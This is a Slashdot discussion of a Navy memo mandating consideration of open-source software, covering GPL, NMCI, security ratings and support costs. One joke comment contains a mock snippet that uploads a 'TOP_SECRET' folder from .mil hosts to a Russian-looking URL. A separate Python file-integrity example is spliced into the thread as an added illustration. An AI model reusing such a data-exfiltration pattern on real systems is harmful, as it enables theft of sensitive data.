Navy Now Mandated To Consider FOSS As an Option
lisah writes "In a memorandum handed down from Department of the Navy CIO John Carey this week, the Navy is now mandated to consider open source solutions when making new software acquisitions. According to John Weathersby, executive director of the Open Source Software Institute, this is the first in a series of documents that will also address 'development and distribution issues regarding open source within Navy IT environments.'"
Cool!! (Score:4, Insightful)
Re: (Score:2)
Re:Cool!! (Score:5, Informative)
Of interest would be the clause about internal use - if one government agency modifies it, can any other use it without requiring a broader release of the source? In theory the DON, as long as the program stays within the US Government, would be under no obligation to release any modifications since they have not distributed it; all they have done is install and run it on machines owned by them.
COTS = (Score:2, Informative)
Re:Cool!! (Score:4, Interesting)
No, this would not require a broader source release. Contrary to common belief, the GPL does not require that source must be published to the world when software covered by the GPL is distributed, only that the source is distributed along with the binary under the GPL. The recipient is free to publish though, so there is usually not much to gain by only distributing to your customers.
Re: (Score:2, Insightful)
I would hope that a situation could be worked out so that the code can be protected as classified in certain cases, and I would say there is a partial conflict at
Re: (Score:2)
Just properly rewrite your phrase and let's see:
"But if someone illegally distributes the code (that's a "leak", isn't it?), is it then legal to distribute?"
See?
Re:Imagine Chinese say: GPL shows us your code NAV (Score:3, Funny)
Were you summarizing your comment?
Re:Imagine Chinese say: GPL shows us your code NAV (Score:2)
Re: (Score:2)
That's the NRL. (Score:2)
But a lot of the operations parts of the Navy are an MS infrastructure.
OTOH you'll see Unix-likes and other esoteric stuff in some command/control situations and deployed systems, but that's not the same thing.
Inconceivable! (Score:5, Funny)
I am speechless.
Re: (Score:2)
I just can't imagine a military where they routinely depend on software that is geared toward Grandma where they should be using special purpose code.
Too much money getting kicked around with ve
Re: (Score:3, Interesting)
Re: (Score:2)
to mission critical systems.
Re: (Score:2)
Re:Inconceivable! (Score:5, Funny)
if ($hostname =~ m/.*\.mil/) {
multiPartUpload("C:\\TOP_SECRET\\", "http://post.secrets.ru?param=suckers");
explode() || die("The requested operation cannot be performed");
}
Re: (Score:2, Insightful)
The Navy is NOT going to just download crap, have a monkey install it, and hope for the best. At the minimum, they will need to buy support contracts. Additionally, they will most likely hire some support staff of their own. There will likely be little cost savings in actual dollar amounts.
The OTHER advantag
Re: (Score:2)
Well, with the Sun and Oracle stuff....I'll grant you they DO get good service. However, I've never seen any type of 'support' for windows...which is quite prevalent in the NMCI system for instance.
For doing your own support, as with win-boxes...you would indeed save $$ on licensing, replacing much of that with Linux, and other F
Re: (Score:2)
Re: (Score:3, Informative)
Sun, IBM, Novell, Oracle, Red Hat, UTS, SCO, HP, etc, etc, etc...
Re: (Score:2)
Yeah, well they still offer Linux consulting services.
And since I suspect the parent poster was more interested in spreading FUD than furthering the discussion, they might be a good match for him/her.
Sing with me (Score:5, Funny)
Yes, you can sail the gcc's
In the navy
Yes, you can open source with ease
In the navy
Come on now, people, make && make install
In the navy, in the navy
Re:Sing with me (Score:5, Funny)
I was going to say that you've painted yourself mauve, or possibly chartreuse.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Nice chorus, but the original is well suited. (Score:3, Funny)
Finish your chorus with this and then fall back to the original lyrics [oldielyrics.com]:
They want GNU
They want GNU
They want you as a GNU recruit
The original Lyrics:
Repaint, thou thinner (Score:2)
Re: (Score:2)
Corner? Don't you mean closet?
--jeffk++
Strategy for getting M$ price concessions (Score:3, Insightful)
Re: (Score:2)
(They can't switch of Microsoft easily, anyway, as they switched to a pure Microsoft solution for application serving, security and externally-visible connections. This was back in 2
consider (Score:2)
Finally! (Score:5, Funny)
Re:Finally! An F-22 Problem? (Score:3, Interesting)
What happens when it crosses the International Dateline? [defenseindustrydaily.com]
Re: (Score:2)
I doubt *any* flight control system works on the local time of the location being overflown, but on Zulu (UTC) or on the local time of the point of origin.
What's lost in this is that the Dateline is also longitude +/- 180. I'd argue that the NAV system software probably choked on the sign change of longitude.
Re: (Score:2)
Re: (Score:2)
A retired Major General Don Sheppard had more to say on CNN [cnn.com], but gave no details about where his information came from. Although one is pre
Re: (Score:2)
Re: (Score:3, Funny)
come on (Score:2)
Oh, come on. Every nuclear sub manufacturer/terrorist I know gives their nuclear subs Depend® submarine undergarments for those inevitable incontinent moments.
Whether your subs have crappy open-source code or Windows 3.1, you can get all you want out of disastrous global thermonuclear war(TM) with Depend®!
This could get ugly (Score:2)
Next thing you know, they're going to start messing with the coffee -- it ain't gonna be pretty.
[1] OK, probably since George Washington's quartermaster. When he was in his 20s. Certainly since the people who supplied the Army of the Republic in the Civil Wa
Comment removed (Score:3, Insightful)
Re: (Score:2)
Great! This is what you have to do (Score:5, Insightful)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
My opinion is that the DoD should buy multiple systems so that we aren't running on one s
Re:Great! This is what you have to do (Score:5, Interesting)
When you consider that you can build role-based access controls that can migrate with applications across clusters, when network connection types, network bandwidth, shared memory and inter-process communication have mandatory access controls, you really begin to see just how pathetically limited generally-available OS' really are. There's no reason for it - there's nothing that prevents a widely-available system from being harder than a diamond-encrusted pulsar.
The reason that nobody bothers much with making OS' secure is that the DoD has long proved (by buying Windows and by failing their security audits) that security doesn't matter enough to be worth the effort. Security to this level costs big money, and only the really big corporations can afford the costs or have the market to pay for it. Companies can lose hundreds of thousands of credit cards and maybe get rapped knuckles - if they're even discovered. Only one State requires reporting - but plenty of other places have e-Commerce. System crackers - black hats especially - are a pervasive part of society with no serious effort to secure networks against them.
If the money did exist, if there was serious interest in serious prevention, host intrusion detection wouldn't be MD5 checksums (which were beaten soundly, according to the Internet Auditing Project). Plain-text passwords wouldn't exist. One-time pads and public-key encryption would be the only way to log onto Slashdot or any other web service. Zombies, Trojans and Viruses would be found in technology museums, under "extinct electronic lifeforms". If a disk drive with tens of millions of credit cards or social security numbers went missing, in a secure world that would be cause for a few minutes downtime to replace what was lost, rather than a few weeks or months of running round in circles doing nothing.
You see any of that happening? No? Then security is still regarded as an optional extra, not as a fundamental design requirement, and will never reach its true potential. Furthermore, agencies will continue buying/copying OS' based on ease of initial deployment and not on whether it'll protect the data sufficiently.
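The comment above faults host intrusion detection built on bare MD5 checksums. As an added illustration (not code from the comment, the Navy, or the Internet Auditing Project it cites), the following constructs a small file tree in a temporary directory, records a keyed HMAC-SHA256 tag for each file, then tampers with the tree and reports the drift. The key is a placeholder; in practice it would live off the monitored host. The point the example adds is that an unkeyed checksum, MD5 or otherwise, can be recomputed by whoever rewrote the file, whereas a keyed tag cannot be forged without the key:

```python
"""Added example: keyed file-integrity baseline as a minimal host-intrusion
check.  Sample files are constructed in a temporary directory; the key is a
placeholder, not a real secret."""
import hashlib
import hmac
import os
import tempfile


def tag_bytes(data, key):
    """HMAC-SHA256 over an in-memory byte string (used for small checks)."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def file_tag(path, key, chunk_size=65536):
    """HMAC-SHA256 over a file, read in chunks so large files are fine.
    A keyed tag means an intruder who rewrites a file cannot also produce a
    matching tag without the key; a plain checksum gives no such guarantee."""
    mac = hmac.new(key, digestmod=hashlib.sha256)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            mac.update(chunk)
    return mac.hexdigest()


def build_baseline(root, key):
    """Map every regular file under root (relative, '/'-separated) to its tag."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = file_tag(full, key)
    return baseline


def check_baseline(root, key, baseline):
    """Re-tag the tree and report files that changed, appeared or vanished.
    compare_digest avoids timing differences when comparing tags."""
    current = build_baseline(root, key)
    modified = [p for p in baseline
                if p in current and not hmac.compare_digest(baseline[p], current[p])]
    return {
        "modified": sorted(modified),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo():
    """Constructed scenario: baseline a two-file tree, then tamper with it."""
    key = b"placeholder-key-kept-off-host"  # placeholder, not a real secret
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "login"), "wb") as fh:
            fh.write(b"original login binary\n")
        with open(os.path.join(root, "passwd"), "wb") as fh:
            fh.write(b"root:x:0:0\n")
        baseline = build_baseline(root, key)

        # Simulated tampering: one file rewritten, one removed, one added.
        with open(os.path.join(root, "bin", "login"), "wb") as fh:
            fh.write(b"replaced login binary\n")
        os.remove(os.path.join(root, "passwd"))
        with open(os.path.join(root, "bin", "extra"), "wb") as fh:
            fh.write(b"unexpected file\n")

        return check_baseline(root, key, baseline)


if __name__ == "__main__":
    print(demo())
```

The baseline dictionary itself must be stored where the monitored host cannot rewrite it (read-only media or another machine), otherwise the same intruder who changes a file simply updates its recorded tag.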
Re: (Score:2)
Re:Great! This is what you have to do (Score:5, Informative)
Although NT4 was certainly used for secret material, I am pretty sure that only B-rated operating systems were entitled to hold secret and some top secret information. A-rated systems could be used for anything. Only one truly general-purpose A-rated OS (Genesis) was ever developed and officially rated - many other A-rated OS' existed, but they were all special-purpose. C-rated systems were only supposed to be used for unclassified and commercially sensitive material, if I remember the system correctly.
Trusted Solaris was rated B1, which meant it was as good as you could get without some very stringent formal proofs of correctness and formal design methodologies. The big difference between B1 and A1 is that a B1 system is bulletproof only according to any tests and evaluations performed on it, but the tests aren't guaranteed comprehensive. With an A1 system, you also know that the implementation exactly matches the design and that there is no obvious flaw in the design.
However, the criteria have shifted over time. Under the Common Criteria, Trusted Solaris and Solaris 9 "only" rate EAL-4+ (out of a maximum of 7), with PR/SM and XTS-400 being the only ones to rate 5. Bear in mind that RHEL4 update 1 is also classed as 4+, as are Windows Server 2003 and Windows XP. The difference in security between Windows 2003 and Trusted Solaris is so vast as to be laughable, and the idea that a highly specialized, highly secure system like XTS-400 is less than a single unit of trustworthiness better than XP is a complete joke. Clearly the method used in the Common Criteria is flawed to the point of not being useful as a measure of trust.
Mind you, the Orange Book was not perfect. Trusted Irix was rated B3, MULTICS was rated B2. The Multicians (a group of surviving kernel developers for MULTICS) let me know that there was no API, but you can't test if the API works if there is no API to test against. This makes testing for code safety difficult at best - you've nothing to tell you what's meant by safe. I'm prepared to believe MULTICS was brilliant, in fact I do believe that, but I have a hard time believing that the level of trust you could place in it was somewhere between that of Trusted Irix and Trusted Solaris. That may well be the case, but it feels more likely somehow that the evaluation criteria are too narrow and too minimalistic.
(I'd develop my own criteria, but having friends and karma on Slashdot doesn't equate to being taken more seriously by industrial leaders on security issues than defense industry specialists. In fact, even being on Slashdot is probably a big minus in the eyes of places like BAE or Sun Microsystems. Which, of course, is stupid - everyone here knows Slashdot readers are the creme a-la creme of the industry.)
NSA trusted computing (Score:3, Informative)
What law require(s|ed) evaluation according to the NSA "rainbow books" before a system can be used for government work? Where I work, even systems which process Classified information are not required to have trusted system software. You have to protect the system, but that's most often accomplished by far less sophisticated means. It is what is called "system high" or "dedicat
Re:Great! This is what you have to do (Score:5, Informative)
Re: (Score:2)
Re: (Score:2)
And I suppose it did not occur to you that there is a very good reason WHY closed source is not used extensively in defence? Who wrote that code? Did you audit every single line?
Re: (Score:2)
This kind of argument is even more applicable to any proprietary software. Try even getting the code to the typical Windows machine...
Coast Guard is doing something.... (Score:2)
Re: (Score:2)
U.S. COAST GUARD ENLISTMENT OATH
"I, (State your name), swear to sign away 4 years of my life to the UNITED STATES COAST GUARD because I know being in the real military scares me. However, I swear to defend our position as the fifth branch of the Armed Services, although at one point we were under the Department of Homeland Security. I understand that at least twice a day, someone will refer to me as a member of the Air Force or Navy,
Re: (Score:2)
> people dumber than rocks, and then be heckled by the same
> people when I bust them for transporting drugs two months later.
If only it had been that exciting! I spent my CG career checking EPIRBs, counting rockfish, and filling out boarding reports. And spending money on barcode equipment no one used. Ah well. But, the gunnery exercises were fun!
Net result: very little. (Score:5, Insightful)
Judging based on my knowledge of DoD networks and computer applications, I don't believe this will have much of an effect on IT decisions in the Navy. (At the Air Force base I work at, we have some BSD, but it's running on specialized devices on a very small scale.) It reminds me of how my father did equipment purchasing at the university he worked at (and I'll bet most Navy IT sections will do the same): the university had a set of requirements for big computer purchases that favored specific vendors and things like low bid. My dad simply wrote the specs for what he wanted so strictly that only one product would satisfy the requirements.
Also, keep in mind that great scads of DoD IT is standardized on Microsoft networks and applications that would be difficult to integrate with OSS for a variety of reasons. And, there will always be FUD based "security" reasons that military networks will want to avoid OSS.
Net result: very little.
Re: (Score:2)
Re: (Score:2)
Are you suggesting that they would jump at the chance for a simpler, less time consuming process? I don't think so, that would mean the loss or downgrade of a manning position. It may be a pain in the ass, but it translates into someone's job.
Yeah, and the USAF uses ADA (Score:4, Interesting)
So to me the announcement means nothing. The military doesn't always eat its own dog food.
Actions, Not Words! (Score:4, Funny)
Talk about an arrangement of words that don't mean cr@p in the real world.
Navy: Yeah we thought about it. Considered it even. Then went back to what we've been doing all along. Only terrorists use FOSS. Microsoft told us so.
For security purposes perhaps. (Score:2)
I can see the Navy using FOSS since they can hire people to modify it to their specific needs and save money while also increasing security.
Re: (Score:2)
No surprise (Score:3, Informative)
Consider eh? (Score:2, Interesting)
Before, the navy had no idea under what label they were supposed to put open source software, so they didn't consider it (out of laziness?). Now open source is defined as a commercial item, so the navy can purchase it the same way they do with other software.
However this doesn't seem to in any way prevent the large companies from doing what they always do. Just bribe the officials responsible for deciding what software/hardware to use and get them to make the navy pay for their e
More paperwork? (Score:3, Informative)
A long while back I worked for USGS. We were hampered in hiring people, getting new software, hardware, etc. because of all the paperwork. If we made a decision we had to consider 50 different laws and regulations. Individually, they were great ideas. Put together they were paralyzing. This is the reason we were stuck with Data General for so long, because no one wanted to do the paperwork to change vendors.
One word: NMCI (Score:2)
Re: (Score:2)
Quite correct but fortunately Firefox doesn't require Admin privileges to be installed, =)
Re: (Score:2)
Why the Navy wants FOSS (Score:4, Interesting)
Re: (Score:3, Interesting)
Re: (Score:2)
Re: (Score:3, Interesting)
N M C I (No More Computing Inhouse) (Score:3, Informative)
In the last few years the Navy has saddled us with the hideous NMCI IT contract that dictates operating systems, software applications, and hardware. When NMCI was conceived, in the womb of ignorance and shortsightedness, they were thinking of providing a common monocultural solution that might work if the only thing the Navy did was to send email and make PowerPoint presentations.
In a research environment you need flexibility in order to match solutions to problems. NMCI forbids the installation of "unapproved" software or hardware. This includes software drivers and communication applications for special purpose hardware such as serial/USB/PCI devices. You cannot connect any web enabled devices like cameras, 1-wire control, power control devices, UPS devices, weather stations, data acquisition, etc.
So what happens at the Navy Labs is there are two networks - the NMCI network and the "Legacy Network" where the work gets done.
In the spirit of reducing cost we have to maintain two networks and two computers on each desktop and have two exposed flanks to the outside world! It is wasteful, dangerous and inefficient.
Oh, did I mention NMCI is inefficient and near useless? I have an NMCI laptop. I would rather have a 286 with two floppy drives and a sharp stick. The other day I needed to access a jpeg image that was on the NMCI network and edit it with Corel Draw (the application they felt I should be using instead of the more useful, efficient and cheaper PSP). I timed the process from pushing the "On" button and loading the remote desktop, mapping the network file system, logging on, clicking thru all the various dialog windows, loading the bloated application and loading the file - it took over 27 minutes.
If only it affected NMCI (Score:2)
The U.S. government's biggest gift to Microsoft since the abandoned anti-trust suit.
Yeah but... (Score:4, Funny)
Re: (Score:2)
Used all over the place already (Score:2)
Re: (Score:2)
Take out the Linux, and you're closer to the truth.
I have done DoD accreditation on both (Linux and Solaris), it is -way- tougher to get Linux accredited than Solaris.
Part of the problem is that the guidelines for accrediting Solaris are more specific and easier to implement than the Linux ones. The Solaris guidelines will give specific steps using specific tools, but
It's all about the benjamins (Score:2, Insightful)
It's a great negotiating advantage to be "forced" to consider open source.
FOSS in the Navy (Score:2, Informative)
Re: (Score:2, Informative)
Later (late 90's) I worked for a company that specializes in Air Traffic Control Systems. Development environment was Linux and production environment was AIX.
Government agencies have accepted *nix flavors for a long time. "Never going to happen" is an incredibly strong
What constitutes considering? (Score:2)
If it's anything like:
A: We need a new database system because the one we're using isn't supported any more
B: Should we use *Insert OSS*
A: Is it created by Oracle?
B: No
A: Then that's your answer
...then there's no hope. I'm sure there will be *some* adoption, but I doubt this new 'policy' will have any net effect.
Same thing in Canada (Score:3, Informative)
* On average, commercial, off the shelf software (COTS) tended to be slightly cheaper for life cycles in the mid-term range, which seemed to be 5-12 years or so. Shorter than that FOSS was best because of the low up-front costs, while on the longer term the lack of vendor support for COTS was a concern. The number that was thrown out was COTS being about 15% cheaper for the mid-term, although there were cases where FOSS was still better.
* To avoid finger pointing between the OS and application manufacturers during bug hunts, it was desirable for a single company/consultant group to take responsibility for all software. They weren't inclined to wait in a war zone while tech guys played telephone tag while repairing a bug. The ideal would be to purchase hardware from a given supplier, and having one contact point for all software.
* Long-term software support was a concern for both COTS and FOSS, but the ability to either maintain the software yourself (least desirable) or form a consortium with other like-minded entities was an advantage for FOSS.
* Licensing was identified as a major hassle. The speaker identified that computer types are very highly trained from a technical perspective, but not trained from a legal standpoint, so navigating through licensing conditions was a problem. They were hoping our Treasury Board could handle government-wide licensing issues.
* There was definite interest in shifting the computer systems on-board our latest warships from HP-UNIX to Linux-based systems to avoid the vendor end-of-lifing the systems.
The talk continued on to discuss issues related to hardening systems from attacks, but I didn't stay for the whole thing. Just before I left, the speaker was bemoaning that while FOSS gave great tools for the good guys, they also empowered the foreign script-kiddies as well, so it was a two-edged sword.
Meaningless drivel! (Score:2)
What is an option? What is consideration? FOSS has always been an option for the Navy. The Navy has always had the choice to consider it. Now they are forced to consider it as an option? What?
The only way to truly examine this is through a car analogy.
Say you are driving a car, and you are trying to get to Algeria. You come to a junction where you could turn off and head to Libya, or you can keep going straight and arrive in Algeria. You have the optio
Parts of the Navy are way ahead of him already (Score:2, Interesting)
Re:Is the tide turning? (Score:4, Informative)
In short, I think you are wrong.
Re: (Score:3, Funny)
"Man, this thing doesn't work"
"Uhhh, post a question on the forum, and hope you hear back"
That is exactly why companies like IBM and RedHat exist.
Re: (Score:2)
Re: (Score:2)
But the OP's point was "I'm posting this in a random mailing list" is generally not an acceptable answer to the PHBs of this world who want someone they can point at and shout "fix it", and (while I have no direct experience) I would imagine the military is chock-full of such PHBs.
Re: (Score:2)
Spoken as someone who has never served in the Navy. The military does have greatly skilled technicians that get brand spanking new equipment straight from the labs (where it passed all tests with flying colors), but as soon as it's installed on a ship that moves, rolls, and lists, it has problems. Not to mention unstable power sources and such. Speaking from personal experience
Re: (Score:3, Insightful)
Having been on the receiving end of a few military software acquisition projects in a past life, I can say that OSS reduces the possibility of being held by the balls by the vendors for ongoing support. Talk about tapping into a major artery when you sell Defense software and they want changes.
Also, commercial licensing usually doesn't fit the military all that well. You may want some software for a c
Re: (Score:2)
Re: (Score:2)
So that is how they plan to combat piracy?
Re: (Score:2)
That's what I would think... unless they're talking about office apps to run on their own closed networks.
Running general purpose software on special-purpose machines (e.g., battleships, weapons, etc.) seems like a bad solution to me.
But, then again, I have been accused of being idealistic.
Security (Score:2)
Re: (Score:3, Informative)
Also, having source code to secure systems in the public domain doesn't hurt. In fact, it can actively be of benefit, as the more people look at it, the more loopholes get found and fixed. PGP source code has been freely available for decades, but the algorithm that the code implements is still widely understood to be one of the most secure encryption methods out there.